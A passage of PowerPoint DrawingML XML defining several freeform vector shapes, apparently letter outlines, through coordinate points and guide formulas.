                    <a:lnTo>
                      <a:pt x="190" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="384"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="257" y="153"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="153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7" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3849688" y="1347788"/>
                <a:ext cx="177800" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 257 w 494"/>
                  <a:gd name="T1" fmla="*/ 157 h 589"/>
                  <a:gd name="T2" fmla="*/ 236 w 494"/>
                  <a:gd name="T3" fmla="*/ 126 h 589"/>
                  <a:gd name="T4" fmla="*/ 204 w 494"/>
                  <a:gd name="T5" fmla="*/ 110 h 589"/>
                  <a:gd name="T6" fmla="*/ 188 w 494"/>
                  <a:gd name="T7" fmla="*/ 110 h 589"/>
                  <a:gd name="T8" fmla="*/ 173 w 494"/>
                  <a:gd name="T9" fmla="*/ 115 h 589"/>
                  <a:gd name="T10" fmla="*/ 136 w 494"/>
                  <a:gd name="T11" fmla="*/ 147 h 589"/>
                  <a:gd name="T12" fmla="*/ 131 w 494"/>
                  <a:gd name="T13" fmla="*/ 168 h 589"/>
                  <a:gd name="T14" fmla="*/ 131 w 494"/>
                  <a:gd name="T15" fmla="*/ 189 h 589"/>
                  <a:gd name="T16" fmla="*/ 147 w 494"/>
                  <a:gd name="T17" fmla="*/ 247 h 589"/>
                  <a:gd name="T18" fmla="*/ 178 w 494"/>
                  <a:gd name="T19" fmla="*/ 325 h 589"/>
                  <a:gd name="T20" fmla="*/ 220 w 494"/>
                  <a:gd name="T21" fmla="*/ 404 h 589"/>
                  <a:gd name="T22" fmla="*/ 236 w 494"/>
                  <a:gd name="T23" fmla="*/ 430 h 589"/>
                  <a:gd name="T24" fmla="*/ 257 w 494"/>
                  <a:gd name="T25" fmla="*/ 456 h 589"/>
                  <a:gd name="T26" fmla="*/ 294 w 494"/>
                  <a:gd name="T27" fmla="*/ 478 h 589"/>
                  <a:gd name="T28" fmla="*/ 309 w 494"/>
                  <a:gd name="T29" fmla="*/ 478 h 589"/>
                  <a:gd name="T30" fmla="*/ 331 w 494"/>
                  <a:gd name="T31" fmla="*/ 467 h 589"/>
                  <a:gd name="T32" fmla="*/ 357 w 494"/>
                  <a:gd name="T33" fmla="*/ 446 h 589"/>
                  <a:gd name="T34" fmla="*/ 367 w 494"/>
                  <a:gd name="T35" fmla="*/ 420 h 589"/>
                  <a:gd name="T36" fmla="*/ 367 w 494"/>
                  <a:gd name="T37" fmla="*/ 398 h 589"/>
                  <a:gd name="T38" fmla="*/ 341 w 494"/>
                  <a:gd name="T39" fmla="*/ 320 h 589"/>
                  <a:gd name="T40" fmla="*/ 461 w 494"/>
                  <a:gd name="T41" fmla="*/ 262 h 589"/>
                  <a:gd name="T42" fmla="*/ 493 w 494"/>
                  <a:gd name="T43" fmla="*/ 357 h 589"/>
                  <a:gd name="T44" fmla="*/ 488 w 494"/>
                  <a:gd name="T45" fmla="*/ 435 h 589"/>
                  <a:gd name="T46" fmla="*/ 472 w 494"/>
                  <a:gd name="T47" fmla="*/ 472 h 589"/>
                  <a:gd name="T48" fmla="*/ 414 w 494"/>
                  <a:gd name="T49" fmla="*/ 530 h 589"/>
                  <a:gd name="T50" fmla="*/ 367 w 494"/>
                  <a:gd name="T51" fmla="*/ 556 h 589"/>
                  <a:gd name="T52" fmla="*/ 278 w 494"/>
                  <a:gd name="T53" fmla="*/ 588 h 589"/>
                  <a:gd name="T54" fmla="*/ 236 w 494"/>
                  <a:gd name="T55" fmla="*/ 582 h 589"/>
                  <a:gd name="T56" fmla="*/ 194 w 494"/>
                  <a:gd name="T57" fmla="*/ 572 h 589"/>
                  <a:gd name="T58" fmla="*/ 120 w 494"/>
                  <a:gd name="T59" fmla="*/ 509 h 589"/>
                  <a:gd name="T60" fmla="*/ 84 w 494"/>
                  <a:gd name="T61" fmla="*/ 451 h 589"/>
                  <a:gd name="T62" fmla="*/ 47 w 494"/>
                  <a:gd name="T63" fmla="*/ 383 h 589"/>
                  <a:gd name="T64" fmla="*/ 0 w 494"/>
                  <a:gd name="T65" fmla="*/ 247 h 589"/>
                  <a:gd name="T66" fmla="*/ 0 w 494"/>
                  <a:gd name="T67" fmla="*/ 194 h 589"/>
                  <a:gd name="T68" fmla="*/ 5 w 494"/>
                  <a:gd name="T69" fmla="*/ 147 h 589"/>
                  <a:gd name="T70" fmla="*/ 52 w 494"/>
                  <a:gd name="T71" fmla="*/ 73 h 589"/>
                  <a:gd name="T72" fmla="*/ 84 w 494"/>
                  <a:gd name="T73" fmla="*/ 47 h 589"/>
                  <a:gd name="T74" fmla="*/ 126 w 494"/>
                  <a:gd name="T75" fmla="*/ 21 h 589"/>
                  <a:gd name="T76" fmla="*/ 214 w 494"/>
                  <a:gd name="T77" fmla="*/ 0 h 589"/>
                  <a:gd name="T78" fmla="*/ 288 w 494"/>
                  <a:gd name="T79" fmla="*/ 10 h 589"/>
                  <a:gd name="T80" fmla="*/ 320 w 494"/>
                  <a:gd name="T81" fmla="*/ 31 h 589"/>
                  <a:gd name="T82" fmla="*/ 378 w 494"/>
                  <a:gd name="T83" fmla="*/ 89 h 589"/>
                  <a:gd name="T84" fmla="*/ 278 w 494"/>
                  <a:gd name="T85" fmla="*/ 189 h 589"/>
                  <a:gd name="T86" fmla="*/ 257 w 494"/>
                  <a:gd name="T87" fmla="*/ 157 h 5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94" h="589">
                    <a:moveTo>
                      <a:pt x="257" y="157"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="257" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="157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8" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3997325" y="1258888"/>
                <a:ext cx="215900" cy="234950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 446 w 600"/>
                  <a:gd name="T1" fmla="*/ 515 h 652"/>
                  <a:gd name="T2" fmla="*/ 446 w 600"/>
                  <a:gd name="T3" fmla="*/ 515 h 652"/>
                  <a:gd name="T4" fmla="*/ 436 w 600"/>
                  <a:gd name="T5" fmla="*/ 556 h 652"/>
                  <a:gd name="T6" fmla="*/ 425 w 600"/>
                  <a:gd name="T7" fmla="*/ 572 h 652"/>
                  <a:gd name="T8" fmla="*/ 410 w 600"/>
                  <a:gd name="T9" fmla="*/ 588 h 652"/>
                  <a:gd name="T10" fmla="*/ 410 w 600"/>
                  <a:gd name="T11" fmla="*/ 588 h 652"/>
                  <a:gd name="T12" fmla="*/ 378 w 600"/>
                  <a:gd name="T13" fmla="*/ 614 h 652"/>
                  <a:gd name="T14" fmla="*/ 341 w 600"/>
                  <a:gd name="T15" fmla="*/ 635 h 652"/>
                  <a:gd name="T16" fmla="*/ 341 w 600"/>
                  <a:gd name="T17" fmla="*/ 635 h 652"/>
                  <a:gd name="T18" fmla="*/ 310 w 600"/>
                  <a:gd name="T19" fmla="*/ 645 h 652"/>
                  <a:gd name="T20" fmla="*/ 283 w 600"/>
                  <a:gd name="T21" fmla="*/ 651 h 652"/>
                  <a:gd name="T22" fmla="*/ 252 w 600"/>
                  <a:gd name="T23" fmla="*/ 645 h 652"/>
                  <a:gd name="T24" fmla="*/ 231 w 600"/>
                  <a:gd name="T25" fmla="*/ 641 h 652"/>
                  <a:gd name="T26" fmla="*/ 231 w 600"/>
                  <a:gd name="T27" fmla="*/ 641 h 652"/>
                  <a:gd name="T28" fmla="*/ 205 w 600"/>
                  <a:gd name="T29" fmla="*/ 625 h 652"/>
                  <a:gd name="T30" fmla="*/ 184 w 600"/>
                  <a:gd name="T31" fmla="*/ 604 h 652"/>
                  <a:gd name="T32" fmla="*/ 168 w 600"/>
                  <a:gd name="T33" fmla="*/ 578 h 652"/>
                  <a:gd name="T34" fmla="*/ 152 w 600"/>
                  <a:gd name="T35" fmla="*/ 541 h 652"/>
                  <a:gd name="T36" fmla="*/ 0 w 600"/>
                  <a:gd name="T37" fmla="*/ 157 h 652"/>
                  <a:gd name="T38" fmla="*/ 136 w 600"/>
                  <a:gd name="T39" fmla="*/ 105 h 652"/>
                  <a:gd name="T40" fmla="*/ 273 w 600"/>
                  <a:gd name="T41" fmla="*/ 462 h 652"/>
                  <a:gd name="T42" fmla="*/ 273 w 600"/>
                  <a:gd name="T43" fmla="*/ 462 h 652"/>
                  <a:gd name="T44" fmla="*/ 294 w 600"/>
                  <a:gd name="T45" fmla="*/ 498 h 652"/>
                  <a:gd name="T46" fmla="*/ 310 w 600"/>
                  <a:gd name="T47" fmla="*/ 515 h 652"/>
                  <a:gd name="T48" fmla="*/ 310 w 600"/>
                  <a:gd name="T49" fmla="*/ 515 h 652"/>
                  <a:gd name="T50" fmla="*/ 331 w 600"/>
                  <a:gd name="T51" fmla="*/ 520 h 652"/>
                  <a:gd name="T52" fmla="*/ 362 w 600"/>
                  <a:gd name="T53" fmla="*/ 515 h 652"/>
                  <a:gd name="T54" fmla="*/ 362 w 600"/>
                  <a:gd name="T55" fmla="*/ 515 h 652"/>
                  <a:gd name="T56" fmla="*/ 378 w 600"/>
                  <a:gd name="T57" fmla="*/ 504 h 652"/>
                  <a:gd name="T58" fmla="*/ 389 w 600"/>
                  <a:gd name="T59" fmla="*/ 498 h 652"/>
                  <a:gd name="T60" fmla="*/ 399 w 600"/>
                  <a:gd name="T61" fmla="*/ 483 h 652"/>
                  <a:gd name="T62" fmla="*/ 404 w 600"/>
                  <a:gd name="T63" fmla="*/ 472 h 652"/>
                  <a:gd name="T64" fmla="*/ 410 w 600"/>
                  <a:gd name="T65" fmla="*/ 457 h 652"/>
                  <a:gd name="T66" fmla="*/ 410 w 600"/>
                  <a:gd name="T67" fmla="*/ 441 h 652"/>
                  <a:gd name="T68" fmla="*/ 399 w 600"/>
                  <a:gd name="T69" fmla="*/ 399 h 652"/>
                  <a:gd name="T70" fmla="*/ 263 w 600"/>
                  <a:gd name="T71" fmla="*/ 53 h 652"/>
                  <a:gd name="T72" fmla="*/ 399 w 600"/>
                  <a:gd name="T73" fmla="*/ 0 h 652"/>
                  <a:gd name="T74" fmla="*/ 599 w 600"/>
                  <a:gd name="T75" fmla="*/ 525 h 652"/>
                  <a:gd name="T76" fmla="*/ 473 w 600"/>
                  <a:gd name="T77" fmla="*/ 572 h 652"/>
                  <a:gd name="T78" fmla="*/ 446 w 600"/>
                  <a:gd name="T79" fmla="*/ 515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00" h="652">
                    <a:moveTo>
                      <a:pt x="446" y="515"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="446" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="515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9" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4183063" y="1209675"/>
                <a:ext cx="115887" cy="228600"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 322"/>
                  <a:gd name="T1" fmla="*/ 57 h 635"/>
                  <a:gd name="T2" fmla="*/ 153 w 322"/>
                  <a:gd name="T3" fmla="*/ 131 h 635"/>
                  <a:gd name="T4" fmla="*/ 158 w 322"/>
                  <a:gd name="T5" fmla="*/ 131 h 635"/>
                  <a:gd name="T6" fmla="*/ 158 w 322"/>
                  <a:gd name="T7" fmla="*/ 131 h 635"/>
                  <a:gd name="T8" fmla="*/ 169 w 322"/>
                  <a:gd name="T9" fmla="*/ 89 h 635"/>
                  <a:gd name="T10" fmla="*/ 189 w 322"/>
                  <a:gd name="T11" fmla="*/ 52 h 635"/>
                  <a:gd name="T12" fmla="*/ 189 w 322"/>
                  <a:gd name="T13" fmla="*/ 52 h 635"/>
                  <a:gd name="T14" fmla="*/ 200 w 322"/>
                  <a:gd name="T15" fmla="*/ 36 h 635"/>
                  <a:gd name="T16" fmla="*/ 216 w 322"/>
                  <a:gd name="T17" fmla="*/ 20 h 635"/>
                  <a:gd name="T18" fmla="*/ 232 w 322"/>
                  <a:gd name="T19" fmla="*/ 10 h 635"/>
                  <a:gd name="T20" fmla="*/ 253 w 322"/>
                  <a:gd name="T21" fmla="*/ 5 h 635"/>
                  <a:gd name="T22" fmla="*/ 253 w 322"/>
                  <a:gd name="T23" fmla="*/ 5 h 635"/>
                  <a:gd name="T24" fmla="*/ 263 w 322"/>
                  <a:gd name="T25" fmla="*/ 0 h 635"/>
                  <a:gd name="T26" fmla="*/ 263 w 322"/>
                  <a:gd name="T27" fmla="*/ 0 h 635"/>
                  <a:gd name="T28" fmla="*/ 279 w 322"/>
                  <a:gd name="T29" fmla="*/ 0 h 635"/>
                  <a:gd name="T30" fmla="*/ 321 w 322"/>
                  <a:gd name="T31" fmla="*/ 131 h 635"/>
                  <a:gd name="T32" fmla="*/ 321 w 322"/>
                  <a:gd name="T33" fmla="*/ 131 h 635"/>
                  <a:gd name="T34" fmla="*/ 300 w 322"/>
                  <a:gd name="T35" fmla="*/ 136 h 635"/>
                  <a:gd name="T36" fmla="*/ 300 w 322"/>
                  <a:gd name="T37" fmla="*/ 136 h 635"/>
                  <a:gd name="T38" fmla="*/ 279 w 322"/>
                  <a:gd name="T39" fmla="*/ 141 h 635"/>
                  <a:gd name="T40" fmla="*/ 279 w 322"/>
                  <a:gd name="T41" fmla="*/ 141 h 635"/>
                  <a:gd name="T42" fmla="*/ 242 w 322"/>
                  <a:gd name="T43" fmla="*/ 157 h 635"/>
                  <a:gd name="T44" fmla="*/ 242 w 322"/>
                  <a:gd name="T45" fmla="*/ 157 h 635"/>
                  <a:gd name="T46" fmla="*/ 226 w 322"/>
                  <a:gd name="T47" fmla="*/ 167 h 635"/>
                  <a:gd name="T48" fmla="*/ 216 w 322"/>
                  <a:gd name="T49" fmla="*/ 183 h 635"/>
                  <a:gd name="T50" fmla="*/ 216 w 322"/>
                  <a:gd name="T51" fmla="*/ 183 h 635"/>
                  <a:gd name="T52" fmla="*/ 205 w 322"/>
                  <a:gd name="T53" fmla="*/ 199 h 635"/>
                  <a:gd name="T54" fmla="*/ 200 w 322"/>
                  <a:gd name="T55" fmla="*/ 220 h 635"/>
                  <a:gd name="T56" fmla="*/ 200 w 322"/>
                  <a:gd name="T57" fmla="*/ 220 h 635"/>
                  <a:gd name="T58" fmla="*/ 200 w 322"/>
                  <a:gd name="T59" fmla="*/ 241 h 635"/>
                  <a:gd name="T60" fmla="*/ 205 w 322"/>
                  <a:gd name="T61" fmla="*/ 267 h 635"/>
                  <a:gd name="T62" fmla="*/ 305 w 322"/>
                  <a:gd name="T63" fmla="*/ 587 h 635"/>
                  <a:gd name="T64" fmla="*/ 169 w 322"/>
                  <a:gd name="T65" fmla="*/ 634 h 635"/>
                  <a:gd name="T66" fmla="*/ 0 w 322"/>
                  <a:gd name="T67" fmla="*/ 99 h 635"/>
                  <a:gd name="T68" fmla="*/ 132 w 322"/>
